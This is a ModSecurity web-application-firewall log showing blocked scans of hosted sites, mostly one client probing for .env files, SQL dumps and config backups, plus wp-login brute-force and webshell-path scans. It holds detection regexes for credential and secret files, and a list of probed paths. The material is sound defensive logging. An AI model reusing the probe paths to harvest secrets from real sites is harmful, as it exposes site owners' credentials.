[Tue May 26 19:52:49.634685 2026] [security2:error] [pid 86490:tid 86637] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/upload/debug.bak"] [unique_id "ahWsuVZMwN0DpLVWo6Kh3AAAAJY"]
[Tue May 26 19:52:50.067732 2026] [security2:error] [pid 86490:tid 86620] [client 62.60.130.228:57843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWsulZMwN0DpLVWo6Kh7AAAAIU"]
[Tue May 26 19:52:50.477310 2026] [security2:error] [pid 86490:tid 86644] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/docker/dev/.env"] [unique_id "ahWsulZMwN0DpLVWo6Kh-AAAAJ0"]
[Tue May 26 19:52:50.983095 2026] [security2:error] [pid 86490:tid 86662] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api-server/.env"] [unique_id "ahWsulZMwN0DpLVWo6KiBAAAAK8"]
[Tue May 26 19:52:52.117486 2026] [security2:error] [pid 86490:tid 86676] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsu1ZMwN0DpLVWo6KiHgAAAL0"]
[Tue May 26 19:52:52.171034 2026] [security2:error] [pid 86490:tid 86720] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/keys/config.bak"] [unique_id "ahWsvFZMwN0DpLVWo6KiLgAAAOk"]
[Tue May 26 19:52:52.676707 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/env/log.bak"] [unique_id "ahWsvFZMwN0DpLVWo6KiPwAAAMg"]
[Tue May 26 19:52:53.604289 2026] [security2:error] [pid 86490:tid 86746] [client 185.251.19.134:48969] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWsvVZMwN0DpLVWo6KiTgAAAQM"]
[Tue May 26 19:52:54.032004 2026] [security2:error] [pid 86490:tid 86659] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sql/restore.sql"] [unique_id "ahWsvlZMwN0DpLVWo6KicAAAAKw"]
[Tue May 26 19:52:54.043193 2026] [security2:error] [pid 86490:tid 86734] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsvVZMwN0DpLVWo6KiXwAAAPc"]
[Tue May 26 19:52:55.382940 2026] [security2:error] [pid 86490:tid 86728] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/env/example/.env"] [unique_id "ahWsv1ZMwN0DpLVWo6KikwAAAPE"]
[Tue May 26 19:52:56.399303 2026] [security2:error] [pid 86490:tid 86736] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mysql_dump.sql"] [unique_id "ahWswFZMwN0DpLVWo6KitAAAAPk"]
[Tue May 26 19:52:56.908057 2026] [security2:error] [pid 86490:tid 86672] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/report.php.bak"] [unique_id "ahWswFZMwN0DpLVWo6KizQAAALk"]
[Tue May 26 19:52:56.932068 2026] [security2:error] [pid 86490:tid 86640] [client 14.161.197.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWswFZMwN0DpLVWo6KiugAAAJk"]
[Tue May 26 19:52:57.238903 2026] [security2:error] [pid 86490:tid 86718] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWswFZMwN0DpLVWo6KiwwAAAOc"]
[Tue May 26 19:52:58.261814 2026] [security2:error] [pid 86490:tid 86731] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/download.php.bak"] [unique_id "ahWswlZMwN0DpLVWo6Ki8AAAAPQ"]
[Tue May 26 19:52:58.428436 2026] [security2:error] [pid 86490:tid 86622] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stylesheets/.env"] [unique_id "ahWswlZMwN0DpLVWo6Ki-AAAAIc"]
[Tue May 26 19:52:58.764321 2026] [security2:error] [pid 86490:tid 86666] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Final_Project/kafka_twitter/.env"] [unique_id "ahWswlZMwN0DpLVWo6KjAgAAALM"]
[Tue May 26 19:52:59.117044 2026] [security2:error] [pid 86490:tid 86646] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWswlZMwN0DpLVWo6Ki_wAAAJ8"]
[Tue May 26 19:52:59.409218 2026] [security2:error] [pid 86490:tid 86643] [client 114.119.129.175:29127] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gcirsm.org.in"] [uri "/robots.txt"] [unique_id "ahWsw1ZMwN0DpLVWo6KjGAAAAJw"]
[Tue May 26 19:52:59.439903 2026] [security2:error] [pid 86490:tid 86637] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/phpinfo.php.copy.original.bak"] [unique_id "ahWsw1ZMwN0DpLVWo6KjGQAAAJY"]
[Tue May 26 19:53:00.243236 2026] [security2:error] [pid 86490:tid 86714] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/signin/.env"] [unique_id "ahWsxFZMwN0DpLVWo6KjMgAAAOM"]
[Tue May 26 19:53:00.566006 2026] [security2:error] [pid 86490:tid 86700] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/data/test.bak"] [unique_id "ahWsxFZMwN0DpLVWo6KjNwAAANU"]
[Tue May 26 19:53:01.051202 2026] [security2:error] [pid 86490:tid 86686] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Modix/ClientApp/.env"] [unique_id "ahWsxVZMwN0DpLVWo6KjRgAAAMc"]
[Tue May 26 19:53:01.869851 2026] [security2:error] [pid 86490:tid 86603] [remote 38.95.35.74:35398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsxVZMwN0DpLVWo6KjWQAAmXA"]
[Tue May 26 19:53:02.598766 2026] [security2:error] [pid 86490:tid 86747] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsxlZMwN0DpLVWo6KjcgAAAQQ"]
[Tue May 26 19:53:02.676245 2026] [security2:error] [pid 86490:tid 86639] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sites/default/files/backup_migrate/backups/full/latest/db/db.sql"] [unique_id "ahWsxlZMwN0DpLVWo6KjfQAAAJg"]
[Tue May 26 19:53:03.434407 2026] [security2:error] [pid 86490:tid 86602] [remote 38.95.35.74:35398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsx1ZMwN0DpLVWo6KjkgAA5W8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:53:03.811219 2026] [security2:error] [pid 86490:tid 86739] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/dump.sql"] [unique_id "ahWsx1ZMwN0DpLVWo6KjqAAAAPw"]
[Tue May 26 19:53:03.945231 2026] [security2:error] [pid 86490:tid 86726] [client 85.208.96.210:13494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWsx1ZMwN0DpLVWo6KjrwAAAO8"]
[Tue May 26 19:53:03.945360 2026] [security2:error] [pid 86490:tid 86726] [client 85.208.96.210:13494] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWsx1ZMwN0DpLVWo6KjrwAAAO8"]
[Tue May 26 19:53:04.132871 2026] [security2:error] [pid 86490:tid 86652] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config.php.old"] [unique_id "ahWsyFZMwN0DpLVWo6KjtAAAAKU"]
[Tue May 26 19:53:04.491438 2026] [security2:error] [pid 86490:tid 86671] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsyFZMwN0DpLVWo6KjswAAALg"]
[Tue May 26 19:53:04.618690 2026] [security2:error] [pid 86490:tid 86715] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/react-app/api/.env"] [unique_id "ahWsyFZMwN0DpLVWo6KjvQAAAOQ"]
[Tue May 26 19:53:05.101899 2026] [security2:error] [pid 86490:tid 86699] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.bak1"] [unique_id "ahWsyVZMwN0DpLVWo6Kj0AAAANQ"]
[Tue May 26 19:53:05.262293 2026] [security2:error] [pid 86490:tid 86638] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shop-app/api/.env"] [unique_id "ahWsyVZMwN0DpLVWo6Kj0QAAAJc"]
[Tue May 26 19:53:05.422252 2026] [security2:error] [pid 86490:tid 86653] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ecommerce-app/client/.env"] [unique_id "ahWsyVZMwN0DpLVWo6Kj2AAAAKY"]
[Tue May 26 19:53:05.907800 2026] [security2:error] [pid 86490:tid 86726] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/temp/error.log.bak"] [unique_id "ahWsyVZMwN0DpLVWo6Kj5gAAAO8"]
[Tue May 26 19:53:06.057573 2026] [security2:error] [pid 86490:tid 86613] [remote 143.198.203.76:43924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWsyVZMwN0DpLVWo6Kj5QAA23o"]
[Tue May 26 19:53:06.061800 2026] [security2:error] [pid 86490:tid 86629] [client 114.119.153.186:20799] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/blog/kurumsal-web-sitesi-tasarim-hizmetleri-nelerdir"] [unique_id "ahWsylZMwN0DpLVWo6Kj7gAAAI4"], referer: https://cagmedya.com/
[Tue May 26 19:53:06.553360 2026] [security2:error] [pid 86490:tid 86658] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/bdd/fixtures/sidetree-mock/.env"] [unique_id "ahWsylZMwN0DpLVWo6Kj_gAAAKs"]
[Tue May 26 19:53:06.713658 2026] [security2:error] [pid 86490:tid 86742] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fastapi-app/backend/.env"] [unique_id "ahWsylZMwN0DpLVWo6Kj_wAAAP8"]
[Tue May 26 19:53:06.844718 2026] [security2:error] [pid 86490:tid 86668] [client 74.249.173.207:4912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWsylZMwN0DpLVWo6KkAAAAALU"]
[Tue May 26 19:53:06.844944 2026] [security2:error] [pid 86490:tid 86668] [client 74.249.173.207:4912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWsylZMwN0DpLVWo6KkAAAAALU"]
[Tue May 26 19:53:07.024988 2026] [security2:error] [pid 86490:tid 86716] [client 74.249.173.207:4913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/core/init.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkDgAAAOU"]
[Tue May 26 19:53:07.025079 2026] [security2:error] [pid 86490:tid 86716] [client 74.249.173.207:4913] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/core/init.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkDgAAAOU"]
[Tue May 26 19:53:07.177866 2026] [security2:error] [pid 86490:tid 86736] [client 74.249.173.207:4926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkFgAAAPk"]
[Tue May 26 19:53:07.177968 2026] [security2:error] [pid 86490:tid 86736] [client 74.249.173.207:4926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkFgAAAPk"]
